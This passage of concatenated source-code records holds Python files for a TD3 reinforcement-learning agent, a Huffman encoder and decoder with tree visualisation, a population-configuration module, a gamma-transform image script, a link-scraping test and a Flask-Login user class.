self.train_env.agents[0].get_observation_space_shape()\n action_dim = self.train_env.agents[0].action_space.shape[0]\n\n self.actor = Actor(state_dim,\n action_dim, max_action,\n hyperparameters[\"net_arch\"][\"pi\"],\n hyperparameters[\"activation_fn\"],\n device=device).to(self.device)\n self.actor_target = copy.deepcopy(self.actor)\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),\n lr=hyperparameters[\"learning_rate\"])\n\n self.critic = Critic(state_dim,\n action_dim,\n hyperparameters[\"net_arch\"][\"qf\"],\n hyperparameters[\"activation_fn\"]).to(self.device)\n self.critic_target = copy.deepcopy(self.critic)\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(),\n lr=hyperparameters[\"learning_rate\"])\n\n self.max_action = max_action\n self.buffer_size = hyperparameters[\"buffer_size\"]\n self.discount = hyperparameters[\"gamma\"]\n self.tau = hyperparameters[\"tau\"]\n self.batch_size = hyperparameters[\"batch_size\"]\n self.policy_noise = hyperparameters[\"policy_noise\"] * self.max_action\n self.noise_clip = hyperparameters[\"noise_clip\"] * self.max_action\n self.policy_freq = hyperparameters[\"policy_freq\"]\n\n self.replay_buffer = utils.ReplayMemory(hyperparameters[\"buffer_size\"],\n device=self.device)\n self.trackr = tracker.tracker(100)\n\n # Early stopping\n self.early_stopping = early_stopping\n self.exit = False\n\n self.total_it = 0\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(self.device)\n return self.actor(state).cpu().data.numpy().flatten()\n\n def train(self, replay_buffer):\n self.total_it += 1\n\n # Sample replay buffer\n state, action, next_state, reward, not_done = replay_buffer.sample(self.batch_size)\n\n with torch.no_grad():\n # Select action according to policy and add clipped noise\n noise = (\n\t\t 
torch.randn_like(action) * self.policy_noise).clamp(\n\t\t -self.noise_clip, self.noise_clip)\n\n next_action = (\n\t\t self.actor_target(next_state) + noise\n\t\t\t).clamp(-self.max_action, self.max_action)\n\n # Compute the target Q value\n target_Q1, target_Q2 = self.critic_target(next_state, next_action)\n target_Q = torch.min(target_Q1, target_Q2)\n target_Q = reward + not_done * self.discount * target_Q\n\n # Get current Q estimates\n current_Q1, current_Q2 = self.critic.forward(state, action)\n\n # Compute critic loss\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # Delayed policy updates\n if self.total_it % self.policy_freq == 0:\n\n # Compute actor loss\n actor_loss = -self.critic.Q1(state, self.actor(state)).mean()\n\n # Optimize the actor\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Update the frozen target models\n for param, target_param in zip(self.critic.parameters(),\n self.critic_target.parameters()\n ):\n target_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n for param, target_param in zip(self.actor.parameters(),\n self.actor_target.parameters()\n ):\n target_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n return critic_loss.cpu().detach().numpy(), actor_loss.cpu().detach().numpy()\n\n return critic_loss.cpu().detach().numpy(), None\n\n def save(self, filename):\n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(),\n filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n torch.save(self.actor_optimizer.state_dict(),\n filename + \"_actor_optimizer\")\n\n def load(self, filename):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n\n def explore_for_expert_targets(self,\n reward_target_exploration_steps=25_000):\n if self.train_env is None:\n print(\"Model cannot explore because training environment is\\\n missing. Please reload model and supply a training environment.\")\n return\n\n self.done = False\n for t in range(reward_target_exploration_steps):\n obs_vec = self.train_env.step(self.actor, random=True)\n\n for indiv_obs in obs_vec:\n if indiv_obs[4] is True:\n self.done = True\n\n if self.done:\n self.train_env.reset()\n self.done = False\n \t#env.tracker.create_video()\n self.train_env.tracker.reset()\n\n self.train_env.reset()\n self.done = False\n\n def learn(self,\n timesteps,\n callback,\n start_timesteps=25_000,\n incremental_replay_buffer = None):\n\n if self.train_env is None:\n print(\"Model cannot explore because training environment is\\\n missing. 
Please reload model and supply a training environment.\")\n return\n\n next_update_at = self.buffer_size*2\n\n episode_reward = 0\n episode_timesteps = 0\n self.episode_num = 0\n\n callback.on_training_start()\n\n self.train_env.reset()\n self.done = False\n start_time = time.clock_gettime(time.CLOCK_REALTIME)\n\n episode_start_time = start_time\n\n for t in range(1,int(timesteps)+1):\n self.num_timesteps = t\n\n episode_timesteps += 1\n if t < start_timesteps:\n obs_vec = self.train_env.step(model=self.actor, random=True)\n else:\n obs_vec = self.train_env.step(model=self.actor, random=False)\n\n all_rewards = []\n for indiv_obs in obs_vec:\n if indiv_obs[4] is True:\n self.done = True\n all_rewards.append(indiv_obs[2])\n transition = (indiv_obs[0], indiv_obs[3], indiv_obs[1], indiv_obs[2], 1. -indiv_obs[4])\n self.replay_buffer.add(*transition)\n\n episode_reward += float(np.mean(np.array(all_rewards)))\n\n if t >= start_timesteps:\n critic_loss, actor_loss = self.train(self.replay_buffer)\n\n if self.done:\n episode_finish_time = time.clock_gettime(time.CLOCK_REALTIME)\n if t < start_timesteps:\n self.trackr.append(actor_loss=0,\n critic_loss=0,\n episode_reward=episode_reward,\n episode_length = episode_timesteps,\n episode_fps = episode_timesteps / (episode_finish_time - episode_start_time))\n else:\n self.trackr.append(actor_loss=actor_loss,\n critic_loss=critic_loss,\n episode_reward=episode_reward,\n episode_length = episode_timesteps,\n episode_fps = episode_timesteps / (episode_finish_time - episode_start_time))\n\n callback.on_step()\n if self.done:\n self.train_env.reset()\n self.done = False\n episode_reward = 0\n episode_timesteps = 0\n self.episode_num += 1\n self.train_env.tracker.reset()\n episode_start_time = time.clock_gettime(time.CLOCK_REALTIME)\n\n # Early stopping\n if self.exit is True:\n print(f\"Early stopping mechanism triggered at timestep=\\\n {self.num_timesteps} after {self.early_stopping} steps\\\n without improvement ... 
Learning terminated.\")\n break\n\n if incremental_replay_buffer is not None:\n if t >= next_update_at:\n if incremental_replay_buffer == \"double\":\n self.buffer_size *= 2\n next_update_at += self.buffer_size * 2\n elif incremental_replay_buffer == \"triple\":\n self.buffer_size *= 3\n next_update_at += self.buffer_size# * 3\n elif incremental_replay_buffer == \"quadruple\":\n self.buffer_size *= 4\n next_update_at += self.buffer_size# * 3\n\n old_replay_buffer = self.replay_buffer\n self.replay_buffer = utils.ReplayMemory(self.buffer_size,\n device=self.device)\n self.replay_buffer.add_content_of(old_replay_buffer)\n\n print(f\"Updated replay buffer at timestep {t};\\\n replay_buffer_size={self.buffer_size},\\\n len={self.replay_buffer.__len__()}\\\n next_update_at={next_update_at}\")\n\n callback.on_training_end()\n","repo_name":"LukeVassallo/RL_PCB","sub_path":"src/training/TD3.py","file_name":"TD3.py","file_ext":"py","file_size_in_byte":13976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35060627378","text":"import sys, os, heapq \nfrom graphviz import Digraph\n\nclass HeapNode:\n def __init__(self, char, freq):\n self.char = char\n self.freq = freq\n self.left = None\n self.right = None\n \n def __lt__(self, other):\n return self.freq < other.freq\n\n def __eq__(self, other):\n if other == None:\n return False\n if not isinstance(other, HeapNode):\n return False\n return self.freq == other.freq\n \nclass BinaryHeap:\n def __init__(self):\n self.a = []\n \n def get(self, i):\n if i >= len(self.a):\n return\n return self.a[i].freq\n \n # swapping characters and frequencies as swapping nodes\n def swap(self, i, j):\n self.a[i].char, self.a[j].char = self.a[j].char, self.a[i].char\n self.a[i].freq, self.a[j].freq = self.a[j].freq, self.a[i].freq\n \n def add(self, node):\n index_ = self.count()\n self.a.append(node)\n \n while index_ != 0:\n p = self.parent(index_)\n if self.get(p) > self.get(index_):\n self.swap(p, index_)\n index_ = p\n \n def count(self):\n return len(self.a)\n \n def isEmpty(self):\n return len(self.a) == 0\n \n def down_heap(self, i):\n a = self.a \n while True:\n m = a[i].freq\n if self.left(i) < len(a):\n m = min(m, a[self.left(i)].freq)\n if self.right(i) < len(a):\n m = min(m, a[self.right(i)].freq)\n if m == a[i].freq:\n break \n if m == a[self.left(i)].freq:\n self.swap(i, self.left(i))\n i = self.left(i)\n else: \n self.swap(i, self.right(i)) \n i = self.right(i)\n\n def remove_minimum(self): \n if len(self.a) == 0:\n return\n elif len(self.a) == 1:\n x = self.a.pop()\n return x\n x = self.a[0]\n self.a[0] = self.a.pop()\n self.down_heap(0)\n return x\n \n def left(self, i):\n return (2 * i + 1)\n\n def right(self, i):\n return (2 * i + 2)\n\n def parent(self, i):\n return ((i - 1) // 2)\n \nclass Huffman:\n \n def __init__(self, frequency_file=None):\n self.frequency_file = frequency_file\n self.heap = BinaryHeap()\n self.bit_codes = {}\n self.char_freq = []\n \n # get frequencies from generated frequency.txt file for building tree \n def get_dictionary_from_file(self, text_file):\n freq_dict = {}\n \n with open(text_file) as f:\n \n for line in f:\n if line != '\\n':\n a = line.rstrip()\n freq_dict[a[0]] = a[2:]\n else:\n # special case for new line character and its frequency\n a = f.readline()\n freq_dict[line] = a.strip()\n \n return freq_dict\n\n # Build binary min heap with chars and frequency as nodes\n def generate_min_heap(self, frequency):\n for key, val in frequency.items():\n node 
= HeapNode(key, int(val))\n self.heap.add(node)\n \n # get two smallest nodes in heap and create parent node of them\n # parent's frequency as sum of frequencies of two children nodes\n def make_heap_with_frequency(self):\n while self.heap.count() > 1:\n \n node1 = heapq.heappop(self.heap.a)\n node2 = heapq.heappop(self.heap.a)\n \n node = HeapNode(None, int(node1.freq) + int(node2.freq))\n node.left = node1\n node.right = node2\n \n heapq.heappush(self.heap.a, node)\n \n # generate bit codes for characters recursively\n # left traversal has a value 0, right traversal has a value 1 \n def generate_bit_codes(self, node, bit_val):\n if node == None:\n return\n \n if node.char != None:\n self.bit_codes[node.char] = bit_val\n \n self.generate_bit_codes(node.left, bit_val + \"0\")\n self.generate_bit_codes(node.right, bit_val + \"1\")\n \n # call recursive bit-code generator for each character, pass argument as root\n def bit_code_assignment(self, root):\n bit_val = \"\"\n self.generate_bit_codes(root, bit_val)\n \n # traverse the tree to get characters and frequency values\n def traverse_tree(self, root):\n if root == None:\n return\n \n l = self.traverse_tree(root.left)\n r = self.traverse_tree(root.right)\n \n if root.char != None:\n # add characters and frequency together to the list if character is in leaf node\n self.char_freq.append([root.char, root.freq])\n elif root.char == None:\n # add only frequencies to the list if characters don't exist\n self.char_freq.append([root.freq])\n \n # get whole bit values as replacing each character with its bit value\n def get_encoded_text(self, text):\n with open(text) as text_file:\n bit_vals = \"\"\n \n for line in text_file:\n for character in line:\n bit_vals += self.bit_codes[character]\n \n return bit_vals\n \n # add extra bits if the encoded text is not multiple of 8\n def padding_encoded_text(self, encoded_text):\n # subtracting remaining bits from 1 byte value to get extra number of bits\n extra_padding = 8 - len(encoded_text) % 8\n \n for _ in range(extra_padding):\n encoded_text += \"0\"\n \n # converting extra number of bits to 8 bit value and prepend to our encoded text \n encoded_text = f\"{extra_padding:08b}\" + encoded_text\n return encoded_text\n\n # convert each 8 bits to byte and add it to byte array\n def convert_bits(self, padded_encoded_text):\n if len(padded_encoded_text) % 8 != 0:\n print('Padded Encoded text Error !!!')\n sys.exit(0)\n \n byte = bytearray()\n \n for i in range(0, len(padded_encoded_text), 8):\n byte.append(int(padded_encoded_text[i:i+8], 2))\n \n return byte\n \n # decode binary file, remove padded bits and map each bit to its character\n def decode_text(self, bits_string):\n text_string = \"\"\n \n # remove padded bits and extra number of bits for making bits_string 8 bit multiple\n padded_bits = bits_string[:8]\n extra_bits = int(padded_bits, 2)\n \n bits_string = bits_string[8:len(bits_string)-extra_bits]\n \n # iterate over bits_string to find mapping characters in bit_codes and add it to text_string\n bit = \"\"\n \n for i in range(len(bits_string)):\n bit += bits_string[i]\n if bit in self.bit_codes:\n text_string += self.bit_codes[bit]\n bit = \"\"\n \n return text_string\n \n def buildTree(self):\n frequency = self.get_dictionary_from_file(self.frequency_file)\n \n self.generate_min_heap(frequency)\n \n self.make_heap_with_frequency()\n \n root = self.heap.remove_minimum()\n \n self.bit_code_assignment(root)\n \n # write generated bitcode values and tree data with frequency to files\n \n with 
open('tree.dat', 'w') as treeData, open('bitcodes.dat', 'w') as bitData:\n treeData.write('Character Frequency Bit code values\\n')\n \n for key, val in self.bit_codes.items():\n treeData.write(f'{key} {frequency[key]} {val}\\n')\n bitData.write(f'{key} {val}\\n') \n \n # for visualizing the tree we traverse the tree and add char, frequency values to the list\n self.traverse_tree(root) \n \n # write list of chars and frequency values to visualize.dat for visualizing tree later\n with open(\"visualize.dat\", \"w\") as visualData:\n for i in range(len(self.char_freq)):\n for j in range(len(self.char_freq[i])):\n visualData.write(str(self.char_freq[i][j])+' ')\n visualData.write('\\n')\n \n def encode(self, original_text, bitcodes):\n self.bit_codes = self.get_dictionary_from_file(bitcodes)\n \n encoded_text = self.get_encoded_text(original_text)\n \n padded_encoded_text = self.padding_encoded_text(encoded_text)\n \n byte_array = self.convert_bits(padded_encoded_text)\n\n with open('encoded-text.bin', 'wb') as encoded_message:\n encoded_message.write(bytes(byte_array))\n\n def decode(self, bitcodes, bin_file):\n self.bit_codes = {val:key for key, val in self.get_dictionary_from_file(bitcodes).items()}\n\n with open(bin_file, 'rb') as binary_file, open('decoded-text.txt', 'w') as output_file:\n bits_string = \"\"\n \n while True:\n byte = binary_file.read(1)\n if len(byte) <= 0:\n break\n bits = f'{ord(byte):b}'.rjust(8, \"0\")\n bits_string += bits\n \n decoded_text = self.decode_text(bits_string)\n \n output_file.write(decoded_text)\n \n def visualize(self, bitcodes, visualData):\n \n self.bit_codes = self.get_dictionary_from_file(bitcodes)\n\n dot = Digraph(comment='Huffman Tree', edge_attr={'arrowhead':'none'})\n \n # get character, frequency as list of lists if characters exist, otherwise only frequencies\n with open(visualData) as visual:\n \n for line in visual:\n if line != '\\n':\n line = line.rstrip()\n if len(line.split()) == 2:\n self.char_freq.append([line[0:line.index(' ')], int(line[line.index(' ')+1:])])\n else:\n if line[0] == ' ':\n self.char_freq.append([line[0], int(line[line.index(' ')+1:])])\n else:\n self.char_freq.append([int(line)])\n else:\n first_line = line\n second_line = visual.readline().strip()\n self.char_freq.append([first_line, int(second_line)])\n\n # index to keep track of nodes\n start = 0\n i = 0\n \n while True:\n # the last node or the root in the list\n if len(self.char_freq) == 1:\n break\n # by iterating list of lists, we find frequencies first since they are parents of leaf nodes and further sum of frequencies\n # only frequencies are just one value and value increases as sum of frequencies of children nodes\n if len(self.char_freq[i]) == 1:\n \n # this creates leaf nodes first and when iteration is in upper level, these nodes will be in the correct position as a leaf child node\n if len(self.char_freq[i-2]) != 1 and len(self.char_freq[i-1]) != 1:\n for element in range(start, i-2):\n dot.node(self.bit_codes[self.char_freq[element][0]], \\\n f'{self.char_freq[element]}/{self.bit_codes[self.char_freq[element][0]]}')\n \n # parent node's reference\n p = str(self.char_freq[i][0]) + str(self.char_freq[i-1][0][-1])\n # frequency value of parent node\n d = str(self.char_freq[i][0])\n\n # create a node as d being label, when creating other nodes p will be referenced\n dot.node(p, d) \n # replace the current node with parent's reference\n self.char_freq[i] = [p] \n # case for when left child is frequency value and right child is leaf node\n # all leaf nodes are in 
this format ['character','frequency']/bitcode-value, other nodes are just frequency values\n if len(self.char_freq[i-2]) == 1 and len(self.char_freq[i-1]) != 1:\n dot.edge(p, str(self.char_freq[i-2][0]))\n dot.node(self.bit_codes[self.char_freq[i-1][0]], f'{self.char_freq[i-1]}/{self.bit_codes[self.char_freq[i-1][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-1][0]])\n # case for when left child is leaf node and right child is frequency value\n elif len(self.char_freq[i-2]) != 1 and len(self.char_freq[i-1]) == 1:\n dot.node(self.bit_codes[self.char_freq[i-2][0]], f'{self.char_freq[i-2]}/{self.bit_codes[self.char_freq[i-2][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-2][0]])\n dot.edge(p, str(self.char_freq[i-1][0]))\n # case when left and right children are frequency values\n elif len(self.char_freq[i-2]) == 1 and len(self.char_freq[i-1]) == 1:\n # creating edges between current node and left, right children which were firstly parent nodes of leaf children\n dot.edge(p, str(self.char_freq[i-2][0]))\n dot.edge(p, str(self.char_freq[i-1][0]))\n # case when left and right children are leaf nodes\n else:\n dot.node(self.bit_codes[self.char_freq[i-2][0]], f'{self.char_freq[i-2]}/{self.bit_codes[self.char_freq[i-2][0]]}')\n dot.node(self.bit_codes[self.char_freq[i-1][0]], f'{self.char_freq[i-1]}/{self.bit_codes[self.char_freq[i-1][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-2][0]])\n dot.edge(p, self.bit_codes[self.char_freq[i-1][0]])\n # remove current nodes \n self.char_freq = self.char_freq[:i-2] + self.char_freq[i:] \n start = i - 1\n i -= 2\n \n i += 1\n # render file and output it \n dot.render('huffman-tree.dot', view=True) \n \n# function to determine input format \n# either accepts file or word/sentence as list of strings\ndef determine_input_format():\n if sys.argv[2][-4:] == '.txt' and sys.argv[2] == sys.argv[-1]:\n text_file = sys.argv[2]\n input_format = '.txt'\n else:\n text_file = sys.argv[2:]\n input_format = 'other'\n \n return determine_frequency(text_file, input_format)\n\n# function to count frequencies of each character\n# in a file or word/sentence \n# and write to frequency.txt\ndef determine_frequency(text_file, input_format):\n frequency_dict = {}\n \n # find frequencies of chars in file and add it to dictionary\n if input_format == '.txt':\n with open(text_file) as f:\n for line in f:\n for char in line:\n if char in frequency_dict:\n frequency_dict[char] += 1\n else:\n frequency_dict[char] = 1\n \n # find frequencies of chars in words/sentence and add it to dictionary\n elif input_format == 'other':\n for i in range(len(text_file)): \n for j in range(len(text_file[i])):\n if text_file[i][j] in frequency_dict:\n frequency_dict[text_file[i][j]] += 1\n else:\n frequency_dict[text_file[i][j]] = 1\n # case handling for space character in text from command line\n if ' ' in frequency_dict:\n frequency_dict[' '] += 1\n else:\n frequency_dict[' '] = 1\n # add new line character to text from command line \n frequency_dict['\\n'] = 1\n \n # write text content that is given from command line to the file\n with open('sample.txt', 'w') as f:\n for i in range(len(text_file)): \n for j in range(len(text_file[i])):\n f.write(text_file[i][j])\n f.write(' ')\n f.write('\\n')\n\n # write frequencies with characters to the file\n with open('frequency.txt', 'w') as f:\n for key, val in frequency_dict.items():\n f.write(f'{key} {val} \\n') if key == '\\n' else f.write(f'{key} {val}\\n')\n \n return input_format \n \ndef command_handler():\n # -generate command for 
determining frequency of characters \n    if sys.argv[1] == '-generate':\n        # no text or file given\n        if sys.argv[1] == sys.argv[-1]:\n            print('Enter a text or file in command line')\n            sys.exit(0)\n        input_format = determine_input_format()\n        # check whether original text is derived from file or command line\n        print(f'Original text is in {sys.argv[2]}') if input_format == '.txt' else \\\n        print('Original text is in sample.txt')\n        \n        print('Generated character frequencies for Huffman code')\n        print('Wrote output to frequency.txt')\n    \n    # -buildtree command for building tree with characters and frequency\n    # also building tree with characters and their bit values determined by huffman coding\n    elif sys.argv[1] == '-buildtree':\n        text_file = sys.argv[2]\n        if os.path.exists(text_file):\n            huffman = Huffman(text_file)\n            huffman.buildTree()\n            print('Wrote output to tree.dat and bitcodes.dat. visualize.dat is also generated for visualizing a tree!')\n        else:\n            print(f\"Can't build a tree. {text_file} file doesn't exist!\")\n    \n    # -encode command for encoding text or file and returning binary file\n    elif sys.argv[1] == '-encode':\n        original_file = sys.argv[2]\n        # bitcodes.dat generated from -buildtree command\n        bitcodes = sys.argv[3]\n        if os.path.exists(bitcodes):\n            huffman = Huffman()\n            huffman.encode(original_file, bitcodes)\n            print('Wrote output to encoded-text.bin')\n        else:\n            print(f\"Can't encode a file. {bitcodes} file doesn't exist!\")\n    \n    # -decode command for decoding binary file and returning original text\n    elif sys.argv[1] == '-decode':\n        bitcodes = sys.argv[2]\n        # check whether binary file generated from -encode exists\n        bin_file = sys.argv[3]\n        if os.path.exists(bin_file):\n            huffman = Huffman()\n            huffman.decode(bitcodes, bin_file)\n            print('Wrote output to decoded-text.txt')\n        else:\n            print(f\"Can't decode a file. {bin_file} file doesn't exist!\")\n    \n    # -visualize command for visualizing huffman tree containing characters and frequency as leaf nodes together with their bit code values\n    elif sys.argv[1] == '-visualize':\n        bitcodes, visualData = sys.argv[2], sys.argv[3]\n        # check whether visualData generated from -buildtree exists\n        if os.path.exists(visualData):\n            huffman = Huffman()\n            huffman.visualize(bitcodes, visualData)\n            print('Wrote output to huffman-tree.dot. View visualization in huffman-tree.dot.pdf')\n        else:\n            print(f\"Can't visualize a tree. 
{visualData} file doesn't exist!\")\n\ncommand_handler()\n","repo_name":"KTural/Huffman-Tree","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":19499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20090024225","text":"from typing import List, Set\nfrom uuid import uuid1\n\nfrom src.interfaces import (\n    AgeGroupInterface,\n    DiseaseGroupInterface,\n    MobilityGroupInterface,\n    PopulationInterface,\n    QuarantineGroupInterface,\n    SusceptibilityGroupInterface,\n    VulnerabilityGroupInterface\n)\nfrom src.models.db import Configuration, Population\nfrom src.models.general import Groups\nfrom src.models.route_models import UpdateVariable\nfrom src.utils import BsonObject\n\n\nclass ValidatePopulationDefault:\n\n    @classmethod\n    def handle(cls, configuration: Configuration) -> None:\n        \"\"\"\n        Check whether a population exists for a configuration; if it does not,\n        create one for that configuration.\n\n        :param configuration: Configuration associated to the population.\n        \"\"\"\n        population = PopulationInterface.find_one_by_conf(configuration)\n        if not population:\n            population = Population(\n                identifier=uuid1(),\n                configuration=configuration,\n                allowed_configuration={Groups.AGE.value},\n                allowed_variables={\n                    unit.value for unit in Groups if\n                    unit != Groups.AGE\n                },\n                extra_data={}\n            )\n            population.save()\n\n\nclass FindAllowedVariables:\n\n    @classmethod\n    def handle(cls, population: Population, variable: Set[Groups]) -> List:\n        \"\"\"\n        Find all allowed variables to update in a population and return their\n        values.\n\n        :param population: Population specification to update information.\n        :param variable: Input information to find.\n        \"\"\"\n        current_values = population.values\n        values = [\n            unit.value for unit in Groups\n            if unit.value in current_values.keys()\n        ]\n        # Add default value to the list\n        values.insert(0, Groups.AGE.value)\n\n        if not variable:\n            variable = {}\n        allowed_variables = []\n        for i in values:\n            if Groups(i) not in variable:\n                allowed_variables.append(i)\n        return allowed_variables\n\n\nclass UpdatePopulationValues:\n\n    @classmethod\n    def handle(cls, population: Population, variables: UpdateVariable):\n        \"\"\"\n        Update a population variable according to the variable input.\n\n        :param population: Population specification to update information.\n        :param variables: Input information to update.\n        \"\"\"\n        variables_dict = variables.dict()\n        current_values = population.values\n        current_values.update(\n            {variables_dict.get(\"variable\"): variables_dict.get(\"values\")}\n        )\n\n        allowed_configuration = population.allowed_configuration\n        if variables.variable not in allowed_configuration:\n            allowed_configuration.append(variables.variable)\n\n        allowed_variables = population.allowed_variables\n        if variables.variable in allowed_variables:\n            allowed_variables.remove(variables.variable)\n\n        extra_data = population.extra_data\n        extra_data.chains.update({variables.variable: variables.chain})\n\n        population.update(\n            values=current_values,\n            allowed_configuration=allowed_configuration,\n            allowed_variables=allowed_variables,\n            extra_data=extra_data\n        )\n        population.reload()\n\n\nclass DeletePopulationValues:\n\n    @classmethod\n    def handle(cls, population: Population, variable: Groups) -> bool:\n        \"\"\"\n        Delete the population values for a specific variable and delete its\n        chain.\n\n        :param population: population to modify values.\n        :param variable: variable whose information is removed from the values.\n        
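\n        Illustrative usage (an editor's sketch; the population object and the\n        chosen group are hypothetical, not taken from this project's tests)::\n\n            removed = DeletePopulationValues.handle(population, Groups.MOBILITY)\n            # removed is False while another variable's chain still references it\n        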
\"\"\"\n if not cls._validate_chain(population, variable):\n return False\n population_values = population.values\n if variable.value in population_values.keys():\n del population_values[variable.value]\n\n configuration = population.allowed_configuration\n variables = population.allowed_variables\n if variable.value not in variables:\n variables.append(variable.value)\n if variable.value in configuration:\n configuration.remove(variable.value)\n\n extra_data = population.extra_data\n if variable.value in extra_data.chains:\n del extra_data.chains[variable.value]\n\n population.update(\n values=population_values,\n allowed_configuration=configuration,\n allowed_variables=variables,\n extra_data=extra_data\n )\n\n return True\n\n @classmethod\n def _validate_chain(cls, population: Population, variable: Groups) -> bool:\n chains = population.extra_data.chains\n variable_chain = chains.get(variable.value)\n\n all_values = []\n [all_values.extend(value) for value in population.extra_data.chains.values()]\n if variable.value in list(set(all_values)):\n return False\n return True\n\n\nclass FindVariableResults:\n\n @classmethod\n def handle(cls, configuration: Configuration, variable: Groups) -> dict:\n \"\"\"\n Find specific configuration from simulation according to specific\n variable, return all data from each interface.\n\n :param configuration: configuration associated to find variable in the\n interface\n :param variable: type of variable to find\n \"\"\"\n interface_dict = {\n Groups.AGE: AgeGroupInterface,\n Groups.MOBILITY: MobilityGroupInterface,\n Groups.SUSCEPTIBILITY: SusceptibilityGroupInterface,\n Groups.VULNERABILITY: VulnerabilityGroupInterface,\n Groups.DISEASE: DiseaseGroupInterface,\n Groups.QUARANTINE: QuarantineGroupInterface,\n }\n interface = interface_dict.get(variable)\n if interface:\n return BsonObject.dict(interface.find_all_by_conf(configuration))\n return dict()\n\n\nclass FindVariablesConfigured:\n\n @classmethod\n def handle(cls, population: Population) -> list:\n \"\"\"\n Find all variables configured in population configuration, except age\n configuration and return an array variables.\n\n :param population: population configuration to find variables.\n \"\"\"\n variables_configured = list(set(population.allowed_configuration))\n variables_configured.remove(\"age\")\n return variables_configured\n\n\nclass FindPopulationData:\n\n @classmethod\n def handle(cls, population: Population, variable: Groups) -> dict:\n \"\"\"\n Find values saved for each variable population configured with its\n values and chain.\n\n :param population: Reference to find population values.\n :param variable: value to find current values in a population.\n :return: dictionary with values for each variable.\n \"\"\"\n is_allowed = variable.value not in population.allowed_configuration\n if variable == Groups.AGE or is_allowed:\n return {}\n chain = population.extra_data.chains.get(variable.value)\n values = population.values.get(variable.value)\n\n return cls._map_values(chain, values)\n\n @classmethod\n def _map_values(cls, chain: List[str], values: dict) -> dict:\n return {\n 'chain': chain,\n 'values': cls._rec_data(values)\n }\n\n @classmethod\n def _rec_data(cls, values: dict) -> List:\n list_values = []\n for k, v in values.items():\n if isinstance(v, dict):\n list_values.append(\n {'name': k, 'value': None, 'children': cls._rec_data(v)}\n )\n else:\n list_values.append({'name': k, 'value': v})\n return 
list_values\n\n","repo_name":"fenfisdi/cdslab_agents_config_api","sub_path":"src/use_case/population_use_case.py","file_name":"population_use_case.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36548923682","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAfter normalizing an image we get I(r,c); the gamma transform is O(r,c)=I(r,c)^γ, 0<=r<H, 0<=c<W.\nWith γ=1 the image is unchanged. If the whole image or the region of interest is dark, 0<γ<1 increases the contrast; if it is bright, γ>1 lowers the contrast.\nIn essence, every value in the image matrix is raised to a power.\n\"\"\"\nimport numpy as np\nI = np.array([[1,2],[3,4]])\n# O = np.power(I,2)\n# print(O)\n\nimport cv2\n# image = cv2.imread('../Img/1685800379512.jpg') # gamma=0.5\nimage = cv2.imread('../Img/1685795920851.jpg') # gamma=0.3\n# image = cv2.imread('../Img/26.jpg')\n# image = cv2.imread('../Img/001.jpg')\n# image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n# normalize the image\nf1 = image/255.0\n# gamma transform\ngamma = 0.3\nO = np.power(f1, gamma)\ncv2.imshow('I',image)\ncv2.imshow('O',O)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"tanzlyn/OpenCV-Digital-Image-Processing","sub_path":"OpenCV_Project/Opencv_Image_Processing/contrast_enhancement/Gamma transform.py","file_name":"Gamma transform.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6048060089","text":"from scrapingtools import get_all_global_links\r\n\r\n#left off here: need to make sure we're getting links correctly; test get_all_links local and global\r\n# versions against each other and manually inspect links inside small webpages\r\n\r\n\r\nurl = "https://stackoverflow.com/questions/19168220/scrape-internal-links-with-beautiful-soup"\r\nurl = "https://riverbend.appfolio.com/connect/users/sign_in"\r\nurl = "https://en.wikipedia.org/wiki/Affirmative_conclusion_from_a_negative_premise"\r\nurl = "https://github.com/Matt-Gracz?tab=repositories"\r\n#raw_html = simple_get(url)\r\n#html = parse_raw_html(raw_html)\r\n#links = (html)\r\n#x = [print(link) for link in links if str(link).startswith('/')]\r\n\r\nlocal_links = get_all_global_links(url)\r\nx = [print(link) for link in local_links]\r\n\r\n\r\n","repo_name":"Matt-Gracz/SLEProto","sub_path":"PythonApplication1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69914524970","text":"from flask_login import UserMixin\n\n\nclass User(UserMixin):\n\n    def __init__(self, user: dict):\n        self.username = user['name']\n        self.pwd = user['password']\n        self.user_id = user['id']\n\n    def __repr__(self):\n        return '<User %r>' % self.username\n\n    def get_id(self):\n        return self.user_id\n\n    @staticmethod\n    def get_user_from_name(name):\n        from dataweb.user_list import fetch_user\n        user = fetch_user(property='name', value=name)\n        if user is not None:\n            return User(user)\n        else:\n            return None\n\n    